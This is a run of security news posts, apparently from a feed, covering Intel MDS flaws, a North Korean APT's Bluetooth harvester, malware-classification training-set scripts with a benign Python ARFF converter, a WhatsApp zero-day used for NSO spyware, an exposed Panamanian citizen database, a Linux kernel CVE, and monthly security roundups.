(SecurityAffairs – Adobe, Adobe Patch Tuesday updates May 19)

The post Adobe patches over 80 flaws in Flash, Acrobat Reader, and Media Encoder appeared first on Security Affairs.

Millions of computers powered by Intel chips are affected by MDS flaws

Millions of computers powered by Intel processors are affected by a new class of vulnerabilities (MDS) that can leak potentially sensitive data.

Researchers from multiple universities and security firms discovered a new class of speculative execution side-channel vulnerabilities that could be exploited with new side-channel attack methods dubbed Fallout, RIDL (Rogue In-Flight Data Load), and ZombieLoad.

“On May 14, 2019, Intel and other industry partners shared details and information about a new group of vulnerabilities collectively called Microarchitectural Data Sampling (MDS).” reads a post published by Intel.

“Under certain conditions, MDS provides a program the potential means to read data that program otherwise would not be able to see,” Intel continues. “MDS techniques are based on a sampling of data leaked from small structures within the CPU using a locally executed speculative execution side channel. Practical exploitation of MDS is a very complex undertaking. MDS does not, by itself, provide an attacker with a way to choose the data that is leaked.”

The new class of flaws, dubbed Microarchitectural Data Sampling (MDS), includes four different vulnerabilities that could be triggered to leak arbitrary in-flight data from CPU-internal buffers, such as Line Fill Buffers, Load Ports, or Store Buffers.

“MDS may allow a malicious user who can locally execute code on a system to infer the values of protected data otherwise protected by architectural mechanisms.” reads the security advisory published by Intel. “Refer to the MDS table in Deep dive: CPUID Enumeration and Architectural MSRs for a list of processors that may be affected by MDS. MDS only refers to methods that involve microarchitectural structures other than the level 1 data cache (L1D) and thus does not include Rogue Data Cache Load (RDCL) or L1 Terminal Fault (L1TF).”

Below the list of vulnerabilities in Intel processors:

  1. CVE-2018-12126—Microarchitectural Store Buffer Data Sampling (MSBDS), also known as Fallout attack.
  2. CVE-2018-12130—Microarchitectural Fill Buffer Data Sampling (MFBDS), also known as Zombieload, or RIDL (Rogue In-Flight Data Load).
  3. CVE-2018-12127—Microarchitectural Load Port Data Sampling (MLPDS), also part of RIDL class of attacks.
  4. CVE-2019-11091—Microarchitectural Data Sampling Uncacheable Memory (MDSUM), also part of RIDL class of attacks.

The attacks are similar to the Meltdown and Spectre attacks disclosed in January 2018.

The attacks work against most systems running Intel CPUs made in the past decade; the methods can leak sensitive information such as passwords, disk encryption keys and browser history.

The flaws can be exploited remotely via JavaScript code on rogue websites, or by malware that has already infected the targeted devices.

Intel revealed that the flaws were initially discovered by its experts and partners, and later reported by third-party researchers, including academics from the University of Michigan, Worcester Polytechnic Institute, Graz University of Technology, imec-DistriNet, KU Leuven, University of Adelaide, Microsoft, the VUSec group at VU Amsterdam, Bitdefender, Oracle, and Qihoo 360.

Newer chips, including some 8th and 9th generation Core processors and 2nd generation Xeon Scalable processors, address the above flaws in hardware. Intel already provided for some products microcode updates that address the flaws.

Unlike the security updates for Meltdown and Spectre, the security patches for the MDS flaws should have minimal impact on the performance of most PCs. A performance degradation cannot be excluded in the case of data centers.

Researchers published several research papers (i.e. RIDL, Fallout, ZombieLoad) and set up a dedicated website for the attack methods. They also released working PoC code and video PoCs demonstrating the exploitation of the flaws.

Experts also released Windows and Linux tools to test systems against RIDL and Fallout attacks as well as other speculative execution vulnerabilities.

Tech giants have already published security advisories for the vulnerabilities, including Microsoft, Google, Apple, and Linux distributions. Microsoft, Google, Apple, and HP have already announced the implementation of measures to mitigate potential attacks.

ARM and AMD processors are not affected. 

Pierluigi Paganini

(SecurityAffairs – MDS, Hacking)

The post Millions of computers powered by Intel chips are affected by MDS flaws appeared first on Security Affairs.

North Korea-linked ScarCruft APT adds Bluetooth Harvester to its arsenal

The North Korea-linked APT group ScarCruft (aka APT37 and Group123) continues to expand its arsenal by adding a Bluetooth Harvester.

North Korea-linked APT group ScarCruft (aka APT37, Reaper, and Group123) continues to expand its arsenal by adding a Bluetooth Harvester.

ScarCruft has been active since at least 2012, it made the headlines in early February 2018 when researchers revealed that the APT group leveraged a zero-day vulnerability in Adobe Flash Player to deliver malware to South Korean users.

Kaspersky first documented the operations of the group in 2016. Cyber attacks conducted by the APT37 group mainly targeted government, defense, military, and media organizations in South Korea.

FireEye linked the APT37 group to the North Korean government based on the following clues:

  • the use of a North Korean IP;
  • malware compilation timestamps consistent with a developer operating in the North Korea time zone (UTC +8:30) and following what is believed to be a typical North Korean workday;
  • objectives that align with Pyongyang’s interests (i.e. organizations and individuals involved in Korean Peninsula reunification efforts).

Researchers from FireEye revealed that the nation-state actor also targeted entities in Japan, Vietnam, and even the Middle East in 2017. The hackers targeted organizations in the chemicals, manufacturing, electronics, aerospace, healthcare, and automotive sectors.

Past attacks associated with the ScarCruft APT group involved zero-day vulnerabilities, but Kaspersky researchers pointed out that the threat actor also used public exploits in its campaigns.

In April 2018, ScarCruft APT added a more advanced variant of an Android Trojan, dubbed KevDroid, to its arsenal.

Now Kaspersky Lab experts discovered that ScarCruft is using a “rare” Bluetooth device harvester.

Kaspersky found several victims of a recent campaign in investment and trading companies in Vietnam and Russia.

“We believe they may have some links to North Korea, which may explain why ScarCruft decided to closely monitor them. ScarCruft also attacked a diplomatic agency in Hong Kong, and another diplomatic agency in North Korea.” reads the analysis published by Kaspersky Lab. “It appears ScarCruft is primarily targeting intelligence for political and diplomatic purposes.”


“The ScarCruft group keeps expanding its exfiltration targets to steal further information from infected hosts and continues to create tools for additional data exfiltration.” continues the analysis.

“We also discovered an interesting piece of rare malware created by this threat actor – a Bluetooth device harvester. This malware is responsible for stealing Bluetooth device information.”

The Bluetooth Harvester is delivered by a downloader, it leverages the Windows Bluetooth APIs to collect information on the devices connected via Bluetooth to the compromised system.

The tool gathers several data including device name, address, class, and whether the device is connected, authenticated and remembered.

The dropper used to deliver the Bluetooth Harvester exploits a privilege escalation vulnerability (CVE-2018-8120) or leverages the UACME method to bypass the Windows User Account Control (UAC) feature. Then the malware executes an installer that creates another downloader, which retrieves the final payload hidden inside an image file.

“The downloader malware uses the configuration file and connects to the C2 server to fetch the next payload. In order to evade network level detection, the downloader uses steganography. The downloaded payload is an image file, but it contains an appended malicious payload to be decrypted.” continues Kaspersky.


The final payload is a backdoor, tracked by Cisco as ROKRAT, that is used to download and execute other malware, execute commands, and exfiltrate data.

Kaspersky experts also discovered some overlaps with other APT groups, DarkHotel and KONNI. One of the devices infected with ScarCruft malware was previously compromised by a variant of KONNI and a few days earlier by the GreezeBackdoor, a malware belonging to DarkHotel’s arsenal.

“The ScarCruft has shown itself to be a highly-skilled and active group. It has a keen interest in North Korean affairs, attacking those in the business sector who may have any connection to North Korea, as well as diplomatic agencies around the globe.” concludes Kaspersky. “Based on the ScarCruft’s recent activities, we strongly believe that this group is likely to continue to evolve.”

Pierluigi Paganini

(SecurityAffairs – ScarCruft, Bluetooth Harvester)

The post North Korea-linked ScarCruft APT adds Bluetooth Harvester to its arsenal appeared first on Security Affairs.

Malware Training Sets: FollowUP

The popular expert Marco Ramilli provided a follow-up to his Malware classification activity by adding a scripting section which could be useful for several purposes.

In 2016 I was working hard to find a way to classify Malware families through artificial intelligence (machine learning). One of the first difficulties I met was finding a classified testing set in order to run new algorithms and to test specific features. So, I came up with this blog post and this GitHub repository, where I proposed a new testing set based on a modified version of the Malware Instruction Set for Behavior-Based Analysis, also referred to as MIST. Since that day I have received hundreds of emails from students, researchers and practitioners all around the world asking me how to follow up that research and how to contribute to expanding the training set.


I am so glad that many international researchers used my classified Malware dataset as a building block for making great analyses and for improving the state of the art in Malware research. Some of them are listed here, but many other papers, articles and research works have been released (just ask Google).

Today I finally had the chance to follow it up by adding a scripting section which would be useful to: (i) generate the modified version of MIST files (the one used in the training sets) and (ii) convert the obtained results to ARFF (Attribute Relation File Format) by the University of Waikato. The first script, named mist_json.py, is a reporting module that can be integrated into a running CuckooSandBox environment. It is able to take the Cuckoo report and convert it into a modified version of a MIST file. To do that, drop mist_json.py into your running instance of CuckooSandbox V1 (modules/reporting/) and add the specific configuration section to conf/reporting.conf. You might decide to force its execution without configuration by editing the source code directly. The result would be a MIST file for each Cuckoo-analysed sample. The MIST file wraps the generated features as described in the original post here. By using the second script, named fromMongoToARFF.py, you can convert your JSON objects into ARFF, which is very useful for importing into WEKA to test your favorite algorithms.

Now, if you wish, you can generate training sets by yourself and test new algorithms directly in WEKA. The creation process follows these steps:

  • Upload the samples into a running CuckooSandbox patched with mist_json.py
  • mist_json.py produces a MIST.json file for each submitted sample
  • Use a simple script to import your desired MIST.json files into a MongoDB. For example: for i in */*.json; do mongoimport --db test --collection test --file "$i"; done
  • Use fromMongoToARFF.py to generate the ARFF file
  • Import the generated ARFF into Weka
  • Start your experimental sessions
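As an added example (not the author's mist_json.py or fromMongoToARFF.py), here is a small Python converter that turns MIST-style JSON documents, such as those exported from the MongoDB collection, into an ARFF file ready for Weka. The document layout (a family label plus a flat map of behaviour counts) and the sample values are assumptions made for illustration; the real modified MIST layout is the one described in the original post.

```python
"""Convert MIST-style feature documents into a Weka ARFF file.

Added example for this post, not the author's fromMongoToARFF.py. The
document layout (a "family" label plus a flat "features" map of behaviour
counts) is an assumption made for illustration.
"""
import json

# Constructed sample: three documents as they might sit in the MongoDB
# collection after `mongoimport`. All values are invented.
SAMPLE_DOCS = [
    {"sha256": "sample-a", "family": "trojan",
     "features": {"file_write": 12, "reg_set": 3, "net_connect": 1}},
    {"sha256": "sample-b", "family": "trojan",
     "features": {"file_write": 9, "reg_set": 5}},
    {"sha256": "sample-c", "family": "worm",
     "features": {"net_connect": 40, "process_create": 2}},
]


def collect_attributes(docs):
    """Union of every feature name, sorted so columns are stable across runs."""
    names = set()
    for doc in docs:
        names.update(doc.get("features", {}).keys())
    return sorted(names)


def collect_classes(docs):
    """Sorted set of family labels; these become the nominal class values."""
    return sorted({doc["family"] for doc in docs})


def arff_quote(value):
    """Quote a name or nominal value when ARFF would otherwise misparse it."""
    if any(ch in value for ch in " ,{}'\"%"):
        return "'" + value.replace("'", "\\'") + "'"
    return value


def docs_to_arff(docs, relation="mist"):
    """Build the ARFF text: header, one NUMERIC column per feature, class last."""
    attrs = collect_attributes(docs)
    classes = collect_classes(docs)
    lines = ["@RELATION " + arff_quote(relation), ""]
    for name in attrs:
        lines.append("@ATTRIBUTE %s NUMERIC" % arff_quote(name))
    lines.append("@ATTRIBUTE class {%s}" % ",".join(arff_quote(c) for c in classes))
    lines.extend(["", "@DATA"])
    for doc in docs:
        feats = doc.get("features", {})
        # A feature absent from a sample means the behaviour never occurred,
        # so emit 0 rather than the ARFF "missing value" marker '?'.
        row = [str(feats.get(name, 0)) for name in attrs]
        row.append(arff_quote(doc["family"]))
        lines.append(",".join(row))
    return "\n".join(lines) + "\n"


def load_docs(path):
    """Read one JSON document per line (the default `mongoexport` layout)."""
    with open(path) as fh:
        return [json.loads(line) for line in fh if line.strip()]


if __name__ == "__main__":
    print(docs_to_arff(SAMPLE_DOCS))
```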

If you want to share your new MIST classified files with the community, please feel free to make pull requests directly on GitHub. Everybody using this set will appreciate it.

The original post along many other interesting analysis are available on the Marco Ramilli blog:

https://marcoramilli.com/2019/05/14/malware-training-sets-followup/

About the author: Marco Ramilli, Founder of Yoroi


I am a computer security scientist with an intensive hacking background. I have an MD in computer engineering and a PhD in computer security from the University of Bologna. During my PhD program I worked for the US Government (@ National Institute of Standards and Technology, Security Division), where I did intensive research in malware evasion techniques and penetration testing of electronic voting systems.


I have experience in security testing, since I have been performing penetration testing on several US electronic voting systems. I have also been in charge of testing the uVote voting system for the Italian Minister of homeland security. I met Palantir Technologies, where I was introduced to the Intelligence Ecosystem. I decided to amplify my cybersecurity experience by diving into SCADA security issues with some of the biggest industrial agglomerates in Italy. I finally decided to found Yoroi: an innovative Managed Cyber Security Service Provider developing some of the most amazing cybersecurity defence centers I have ever experienced! Now I technically lead Yoroi, defending our customers, strongly believing in: Defence Belongs To Humans

Pierluigi Paganini

(SecurityAffairs – malware, artificial intelligence)

The post Malware Training Sets: FollowUP appeared first on Security Affairs.

WhatsApp zero-day exploited in targeted attacks to deliver NSO spyware

Facebook fixed a critical zero-day flaw in WhatsApp that has been exploited to remotely install spyware on phones by calling the targeted device.

Facebook has recently patched a critical zero-day vulnerability in WhatsApp, tracked as CVE-2019-3568, that has been exploited to remotely install spyware on phones by calling the targeted device.

WhatsApp did not name the threat actor exploiting CVE-2019-3568; it described the attackers as an “advanced cyber actor” that targeted “a select number of users.”

“A buffer overflow vulnerability in WhatsApp VOIP stack allowed remote code execution via specially crafted series of SRTCP packets sent to a target phone number.” reads the description provided by Facebook.

The WhatsApp zero-day vulnerability is a buffer overflow issue that affects the WhatsApp VOIP stack. The flaw could be exploited by a remote attacker to execute arbitrary code by sending specially crafted SRTCP packets to the targeted mobile device.

Facebook fixed the issue with the release of WhatsApp for Android 2.19.134, WhatsApp Business for Android 2.19.44, WhatsApp for iOS 2.19.51, WhatsApp Business for iOS 2.19.51, WhatsApp for Windows Phone 2.18.348, and WhatsApp for Tizen 2.18.15. Any prior version of the popular instant messaging app is vulnerable. The company also implemented a server-side patch that was deployed at the end of last week.


The bad news is that experts are aware of attacks exploiting the WhatsApp zero-day to deliver surveillance software.

The Financial Times reported that the WhatsApp zero-day has been exploited by threat actors to deliver the spyware developed by surveillance firm NSO Group.

The surveillance software developed by NSO Group has been used by government organizations worldwide to spy on human rights groups, activists, journalists, lawyers, and dissidents. Security experts have detected and analyzed some of the tools in its arsenal, such as the popular Pegasus spyware (for iOS) and Chrysaor (for Android). Chrysaor was used in targeted attacks against journalists and activists, mostly located in Israel; other victims were in Georgia, Turkey, Mexico, the UAE and other countries. Experts believe the Chrysaor espionage 

In September, a report published by Citizen Lab revealed that the NSO Pegasus spyware was used against targets across 45 countries worldwide.

In November, Snowden warned of abuse of surveillance software that also had a role in the murder of the Saudi Arabian journalist Jamal Khashoggi.

Now The Financial Times has described a scary scenario in which attackers were able to exploit the WhatsApp zero-day vulnerability just by making a call to the target device via WhatsApp. Exploitation of the vulnerability does not require the victim’s interaction: the victim does not need to answer for the vulnerability to be exploited, and it seems that after the attack there is no trace of the malicious incoming calls on the device.

The Financial Times cites the case of an unnamed attorney based in the United Kingdom who was targeted on May 12. The lawyer is involved in a lawsuit filed against NSO by individuals who were targeted with the company’s surveillance software.

“The attack has all the hallmarks of a private company reportedly that works with governments to deliver spyware that takes over the functions of mobile phone operating systems,” reads a briefing document note for journalists cited by BBC and other media outlets.

Of course, the NSO Group denied providing any support to government agencies that could have targeted the UK lawyer with its surveillance software.

“NSO would not, or could not, use its technology in its own right to target any person or organization, including this individual,” states NSO group.

Pierluigi Paganini

(SecurityAffairs – WhatsApp Zero-day, Hacking)

The post WhatsApp zero-day exploited in targeted attacks to deliver NSO spyware appeared first on Security Affairs.

Security roundup: May 2019

We round up interesting research and reporting about security and privacy from around the web. This month: password practice, GDPR birthday, c-suite risk, and further reading for security pros.

Passwords: a good day to try hard

No self-respecting security pro would use easy passwords, but could they say the same for their colleagues (i.e. everyone else)? The answer is no, according to the UK National Cyber Security Centre. It released a list of the 100,000 most hacked passwords, as found in Troy Hunt’s ‘Have I Been Pwned’ data set of breached accounts. Unsurprisingly, ‘123456’ topped the list. A massive 23 million accounts use this flimsy string as “protection” (in the loosest possible sense of the word). Next on the list of shame was the almost as unimaginative ‘123456789’, ‘qwerty’, ‘password’ and 1111111.

The NCSC released the list for two reasons: firstly to prompt people to choose better passwords. Secondly, to allow sysadmins to set up blacklists to block people in their organisations from choosing any of these terrible passwords for themselves. The list is available as a .txt file here and the agency blogged about the findings to give more context. Help Net Security has a good summary of the study. The NCSC published the research in the buildup to World Password Day on May 2, which Euro Security Watch said should be every day.

WP Engine recently performed its own analysis of 10 million compromised passwords, including some belonging to prominent (and anonymised) victims. It makes a useful companion piece to the NCSC study by looking at people’s reasons for choosing certain passwords.

Encouraging better security behaviour through knowledge is one part of the job; effective security controls are another. In April, Microsoft said it will stop forcing password resets for Windows 10 and Windows Server because forcing resets doesn’t improve security. CNet’s report of this development noted Microsoft’s unique position of influence, given its software powers almost 80 per cent of the world’s computers. We recently blogged about what the new FIDO2 authentication standard could mean for passwords. Better to use two-factor authentication where possible. Google’s Mark Risher has explained that 2FA offers much more effective protection against risks like phishing.

GDPRversary getting closer

Almost one year on from when the General Data Protection Regulation came into force, we’re still getting to grips with its implications. The European Data Protection Supervisor, Giovanni Buttarelli, has weighed in on the state of GDPR adoption. He covered many areas in an interview with Digiday, including consent, fines, and legitimate interest. One comment we liked was how falling into line with the regulation is an ongoing activity, not a one-time target to hit. “Compliance is a continued working progress for everyone,” he said.

The European Data Protection Board (formerly known as the Article 29 Working Group) recently issued draft guidance on an appropriate legal basis and contractual obligations in the context of providing online services to data subjects. This is a public consultation period that runs until May 24.

The EDPB is also reportedly planning to publish accreditation requirements this summer. As yet, there are no approved GDPR certification schemes or accreditation bodies, but that looks set to change. The UK regulator recently published its own information about certification and codes of conduct.

Meanwhile, Ireland’s Data Protection Commission has started a podcast called Know Your Data. The short episodes have content that mixes information for data controllers and processors, and more general information for data subjects (ie, everyone).

Breaching the c-suite

Senior management are in attackers’ crosshairs as never before, and 12 times more likely to be targeted in social engineering incidents than in years past. That is one of the many highlights from the 2019 Verizon Data Breach Investigations Report. Almost seven out of ten attacks were by outsiders, while just over a third involved internal parties. Just over half of security breaches featured hacking; social engineering was a tactic in 33 per cent of cases. Errors were the cause of 21 per cent of breaches, while 15 per cent were attributed to misuse by authorised users.

Financial intent was behind 12 per cent of all the listed data breaches, and corporate espionage was another motive. As a result, there is a “critical” need for organisations to make all employees aware of the potential threat of cybercrime, Computer Weekly said. ThreatPost reported that executives are six times more likely to be a target of social engineering than a year ago.

Some sites like ZDNet led with another finding: that nation-state attackers are responsible for a rising proportion of breaches (23 per cent, up from 12 per cent a year ago). It also highlighted the role of system admin issues that subsequently led to breaches in cloud storage platforms. Careless mistakes like misconfiguration and publishing errors also left data at risk of access by cybercriminals.

The Verizon DBIR is one of the most authoritative sources of security information. Its content is punchy, backed by a mine of informative stats to help technology professionals and business leaders plan their security strategies. The analysis derives from 41,000 reported cybersecurity incidents and 2,000 data breaches, featuring contributions from 73 public and private organisations across the globe, including Ireland’s Irisscert. The full report and executive summary are free to download here.

Links we liked

Challenge your preconceptions: a new paper argues cybersecurity isn’t important. MORE

An unfortunate trend that needs to change: security pros think users are stupid. MORE

It’s time to panic about privacy, argues the New York Times in this interactive piece. MORE

Want a career in cybersecurity, or know someone who does? Free training material here. MORE

NIST has developed a comprehensive new tool for finding flaws in high-risk software. MORE

NIST also issued guidelines for vetting the security of mobile applications. MORE

Cybersecurity threats: perception versus reality as reported by AT&T Security. MORE

Here’s a technical deep dive into how phishing kits are evolving, courtesy of ZScaler. MORE

A P2P flaw exposes millions of IoT security cameras and other devices to risks. MORE

A new way to improve network security by analysing compressed traffic. MORE


The post Security roundup: May 2019 appeared first on BH Consulting.

Unprotected DB exposed PII belonging to nearly 90% of Panama citizens

Personally identifiable information belonging to roughly 90% of Panama citizens was exposed on a poorly configured Elasticsearch server.

Security researcher Bob Diachenko discovered an unprotected Elasticsearch server exposing personally identifiable information belonging to nearly 90% of Panama citizens.

Exposed data includes full names, birth dates, national ID numbers, medical insurance numbers, and other personal data.

The database contained 3.4 million records related to Panamanian citizens, labeled as “patients,” and 468,086 records labeled as “test-patient.”

“On May 10th I identified a massive bulk of data sitting in an unprotected and publicly available Elasticsearch cluster (hence visible in any browser).” reads the blog post published by Diachenko.

“This database contained 3,427,396 records with detailed information on Panamanian citizens (labeled as ‘patients‘), plus 468,086 records with records labeled as ‘test-patient‘ (although, this data also appeared to be valid and not purely test data).”


The expert reported his discovery to CERT Panama, and within 48 hours the database was secured.

At this time, it is unclear who was running the poorly secured server; in any case, the exposed information appears to be authentic.

Querying the Shodan search engine, the researcher discovered that the IP address associated with the unprotected server had been indexed since April 24th, 2019. Of course, it is impossible to determine whether anyone else accessed the data.

“The danger of having an exposed Elasticsearch or similar NoSql databases is huge.” concludes Diachenko. “I have previously reported that the lack of authentication allowed the installation of malware or ransomware on the MongoDB servers. The public configuration allows the possibility of cybercriminals to manage the whole system with full administrative privileges.” “Once the malware is in place criminals could remotely access the server resources and even launch a code execution to steal or completely destroy any saved data the server contains.”

Pierluigi Paganini

(SecurityAffairs – Panama, data leak)

The post Unprotected DB exposed PII belonging to nearly 90% of Panama citizens appeared first on Security Affairs.

CVE-2019-11815 Remote Code Execution affects Linux Kernel prior to 5.0.8

Security experts have found a race condition vulnerability (CVE-2019-11815) in Linux kernels prior to 5.0.8 that exposes systems to remote code execution.

Linux systems based on kernel versions prior to 5.0.8 are affected by a race condition vulnerability leading to a use-after-free that could be exploited by attackers to achieve remote code execution.

Attackers can trigger the race condition issue that resides in the rds_tcp_kill_sock TCP/IP implementation in net/rds/tcp.c to cause a denial-of-service (DoS) condition and to execute code remotely on vulnerable Linux machines.

The vulnerability could be exploited by sending specially crafted TCP packets to vulnerable Linux systems.

The vulnerability, tracked as CVE-2019-11815, received a CVSS v3.0 base score of 8.1; it could be abused by unauthenticated attackers without user interaction.

However, NIST assigned the vulnerability an exploitability score of 2.2 and an impact score of 5.9, because it is difficult to exploit.

“An issue was discovered in rds_tcp_kill_sock in net/rds/tcp.c in the Linux kernel before 5.0.8. There is a race condition leading to a use-after-free, related to net namespace cleanup.” reads the description provided by Mitre.

The exploitation of the flaw could allow attackers to access resources, modify any files, and deny access to resources.


The development team of Linux kernel already released a security patch that addressed the CVE-2019-11815 flaw at the end of March. The vulnerability was completely fixed with the release of Linux kernel 5.0.8 version.

Below are the security advisories published by the major Linux distributions:

Pierluigi Paganini

(SecurityAffairs – CVE-2019-11815, Linux Kernel)

The post CVE-2019-11815 Remote Code Execution affects Linux Kernel prior to 5.0.8 appeared first on Security Affairs.

Security roundup: March 2019

We round up interesting research and reporting about security and privacy from around the web. This month: ransomware repercussions, reporting cybercrime, vulnerability volume, everyone’s noticing privacy, and feeling GDPR’s impact.

Ransom vs ruin

Hypothetical question: how long would your business hold out before paying to make a ransomware infection go away? For Apex Human Capital Management, a US payroll software company with hundreds of customers, it was less than three days. Apex confirmed the incident, but didn’t say how much it paid or reveal which strain of ransomware was involved.

Interestingly, the story suggests that the decision to pay was a consensus between the company and two external security firms. This could be because the ransomware also encrypted data at Apex’s newly minted external disaster recovery site. Most security experts strongly advise against paying extortionists to remove ransomware. With that in mind, here’s our guide to preventing ransomware. We also recommend visiting NoMoreRansom.org, which has information about infections and free decryption tools.

Bonus extra salutary security lesson: while we’re on the subject of backup failure, a “catastrophic” attack wiped the primary and backup systems of the secure email provider VFE Systems. Effectively, the lack of backup put the company out of business. As Brian Honan noted in the SANS newsletter, this case shows the impact of badly designed disaster recovery procedures.

Ready to report

If you’ve had a genuine security incident – neat segue alert! – you’ll probably need to report it to someone. That entity might be your local CERT (computer emergency response team), to a regulator, or even law enforcement. (It’s called cybercrime for a reason, after all). Security researcher Bart Blaze has developed a template for reporting a cybercrime incident which you might find useful. It’s free to download at Peerlyst (sign-in required).

By definition, a security incident will involve someone deliberately or accidentally taking advantage of a gap in an organisation’s defences. Help Net Security recently carried an op-ed arguing that it’s worth accepting that your network will be infiltrated or compromised. The key to recovering faster involves a shift in mindset and strategy from focusing on prevention to resilience. You can read the piece here. At BH Consulting, we’re big believers in the concept of resilience in security. We’ve blogged about it several times over the past year, including posts like this.

In incident response and in many aspects of security, communication will play a key role. So another helpful resource is this primer on communicating security subjects with non-experts, courtesy of SANS’ Lenny Zeltser. It takes a “plain English” approach to the subject and includes other links to help security professionals improve their messaging. Similarly, this post from Raconteur looks at language as the key to improving collaboration between a CISO and the board.

Old flaws in not-so-new bottles

More than 80 per cent of enterprise IT systems have at least one flaw listed on the Common Vulnerabilities and Exposures (CVE) list. One in five systems have more than ten such unpatched vulnerabilities. Those are some of the headline findings in the 2019 Vulnerability Statistics Report from Irish security company Edgescan.

Edgescan concluded that the average window of exposure for critical web application vulnerabilities is 69 days. Per the report, an average enterprise takes around 69 days to patch a critical vulnerability in its applications and 65 days to patch the same in its infrastructure layers. High-risk and medium-risk vulnerabilities in enterprise applications take up to 83 days and 74 days respectively to patch.

SC Magazine’s take was that many of the problems in the report come from companies lacking full visibility of all their IT assets. The full Edgescan report has even more data and conclusions and is free to download here.

From a shrug to a shun

Privacy practitioners take note: consumer attitudes to security breaches appear to be shifting at last. PCI Pal, a payment security company, found that 62 per cent of Americans and 44 per cent of Britons claim they will stop spending with a brand for several months following a hack or breach. The reputational hit from a security incident could be greater than the cost of repair. In a related story, security journalist Zack Whittaker has taken issue with the hollow promise of websites everywhere. You know the one: “We take your privacy seriously.”

If you notice this notice…

Notifications of data breaches have increased since GDPR came into force. The European Commission has revealed that companies made more than 41,000 data breach notifications in the six-month period since May 25. Individuals or organisations made more than 95,000 complaints, mostly relating to telemarketing, promotional emails and video surveillance. Help Net Security has a good writeup of the findings here.

It was a similar story in Ireland, where the Data Protection Commission saw a 70 per cent increase in reported valid data security breaches, and a 56 per cent increase in public complaints compared to 2017. The summary data is here and the full 104-page report is free to download.

Meanwhile, Brave, the privacy-focused browser developer, argues that GDPR doesn’t make doing business harder for a small company. “In fact, if purpose limitation is enforced, GDPR levels the playing field versus large digital players,” said chief policy officer Johnny Ryan.

Interesting footnote: a US insurance company, Coalition, has begun offering GDPR-specific coverage. Dark Reading quotes a lawyer who said insurance might be effective for risk transference, but it’s untested. Much will depend on the policy’s wording, the lawyer said.

Things we liked

Lisa Forte’s excellent post draws parallels between online radicalisation and cybercrime. MORE

Want to do some malware analysis? Here’s how to set up a Windows VM for it. MORE

You give apps personal information. Then they tell Facebook (PAYWALL). MORE

Ever wondered how cybercriminals turn their digital gains into cold, hard cash? MORE

This 190-second video explains cybercrime to a layperson without using computers. MORE

Blaming the user for security failings is a dereliction of responsibility, argues Ira Winkler. MORE

Tips for improving cyber risk management. MORE

Here’s what happens when you set up an IoT camera as a honeypot. MORE

The post Security roundup: March 2019 appeared first on BH Consulting.